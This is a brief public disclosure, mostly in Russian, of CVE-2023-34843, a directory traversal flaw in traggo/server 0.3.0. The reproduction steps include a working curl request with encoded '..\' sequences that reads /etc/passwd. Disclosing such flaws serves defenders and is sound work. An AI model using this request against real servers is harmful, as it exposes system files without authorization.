
Public disclosure for CVE-2023-34843.
Раскрытие CVE-2023-34843
traggo/server версии 0.3.0 уязвим к обходу каталогов.
Шаги для воспроизведения:
Настройте traggo/server на вашей конечной точке/сервере. https://traggo.net/install/
Выполните GET-запрос по следующему URL. curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
Просмотрите содержимое /etc/passwd